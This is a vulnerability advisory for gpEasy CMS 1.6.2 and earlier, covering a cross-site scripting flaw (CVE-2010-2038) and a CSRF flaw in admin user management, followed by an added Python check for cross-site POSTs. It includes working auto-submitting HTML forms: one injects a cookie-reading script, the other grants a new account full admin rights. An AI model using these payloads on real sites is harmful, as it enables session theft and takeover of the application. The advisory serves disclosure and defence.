CVSS2: 2.1 Low
Access Vector: NETWORK
Access Complexity: HIGH
Authentication: SINGLE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:H/Au:S/C:N/I:P/A:N
EPSS: 0.001 Low
Percentile: 50.9%
High-Tech Bridge SA Security Research Lab has discovered two vulnerabilities in gpEasy CMS which could be exploited to perform cross-site scripting and cross-site request forgery attacks.
Cross-site scripting vulnerability in gpEasy CMS: CVE-2010-2038
The vulnerability exists due to an input sanitization error in the HTTP POST parameter "gpcontent" in include/tool/editing_files.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in a user's browser in the context of the vulnerable website.
Exploitation example:
<form method="POST" action="http://example.com/index.php/Home" name="myfrm">
<input type="hidden" name="cmd" value='save'>
<input type="hidden" name="gpcontent" value='text"><script>alert(document.cookie)</script>'>
</form>
<script>
document.myfrm.submit();
</script>
Cross-site request forgery (CSRF) in gpEasy CMS
The vulnerability exists due to insufficient validation of the request origin in include/admin/admin_users.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link, and create an account with arbitrary privileges within the application. Successful exploitation might result in complete compromise of the application.
Exploitation example:
<form action="http://example.com/index.php/Admin_Users" method="post" name="myfrm">
<input type="hidden" name="cmd" value="ResetDetails" >
<input type="hidden" name="username" value="editor" >
<input type="hidden" name="email" value="[email protected]" >
<input type="hidden" name="grant[]" value="Admin_Menu" >
<input type="hidden" name="grant[]" value="Admin_Uploaded" >
<input type="hidden" name="grant[]" value="Admin_Extra" >
<input type="hidden" name="grant[]" value="Admin_Theme" >
<input type="hidden" name="grant[]" value="Admin_Users" >
<input type="hidden" name="grant[]" value="Admin_Configuration" >
<input type="hidden" name="grant[]" value="Admin_Trash" >
<input type="hidden" name="grant[]" value="Admin_Uninstall" >
<input type="hidden" name="grant[]" value="Admin_Addons" >
<input type="hidden" name="grant[]" value="Admin_New" >
<input type="hidden" name="grant[]" value="Admin_Theme_Content" >
<input type="hidden" name="aaa" value="Continue" >
</form>
<script>
document.myfrm.submit();
</script>
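Both proof-of-concept forms above rely on the browser auto-submitting a POST from another site. The following added example (not part of the original advisory or of gpEasy's code) shows the request-origin validation the advisory says is missing, written as a check that can run in a reverse proxy, WAF rule or log review; the request-record layout, function names and sample hosts are assumptions made for illustration.

```python
from urllib.parse import parse_qs, urlsplit

# cmd values taken from the two proof-of-concept forms in this advisory.
STATE_CHANGING_CMDS = {"save", "ResetDetails"}

def source_host(headers):
    """Host named by Origin, else Referer; None if neither names one (e.g. Origin: null)."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).netloc.lower() or None
    return None

def is_cross_site_post(req):
    """True when a state-changing POST cannot be tied to the site's own pages."""
    if req["method"] != "POST":
        return False
    cmd = parse_qs(req["body"]).get("cmd", [""])[0]
    if cmd not in STATE_CHANGING_CMDS:
        return False
    return source_host(req["headers"]) != req["headers"].get("Host", "").lower()

# Constructed sample requests (not captured traffic).
SAMPLE_REQUESTS = [
    # Administrator submitting the real user form on the site itself.
    {"method": "POST", "path": "/index.php/Admin_Users",
     "headers": {"Host": "example.com", "Referer": "http://example.com/index.php/Admin_Users"},
     "body": "cmd=ResetDetails&username=editor&grant%5B%5D=Admin_Menu"},
    # Same request auto-submitted from a page on another site.
    {"method": "POST", "path": "/index.php/Admin_Users",
     "headers": {"Host": "example.com", "Origin": "http://other-site.test"},
     "body": "cmd=ResetDetails&username=editor&grant%5B%5D=Admin_Users"},
    # Content save with no Origin or Referer at all: no proof of same-site origin.
    {"method": "POST", "path": "/index.php/Home",
     "headers": {"Host": "example.com"},
     "body": "cmd=save&gpcontent=text"},
    # Plain page view: not state-changing, never flagged.
    {"method": "GET", "path": "/index.php/Home",
     "headers": {"Host": "example.com"}, "body": ""},
]

def flagged_paths(requests):
    """Paths of the requests that should be rejected or alerted on."""
    return [r["path"] for r in requests if is_cross_site_post(r)]

if __name__ == "__main__":
    print(flagged_paths(SAMPLE_REQUESTS))
```

A header check of this kind complements, and does not replace, a per-session anti-CSRF token verified by the application on every state-changing request.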
CPE
Name | Operator | Version
---|---|---
gpeasy cms | le | 1.6.2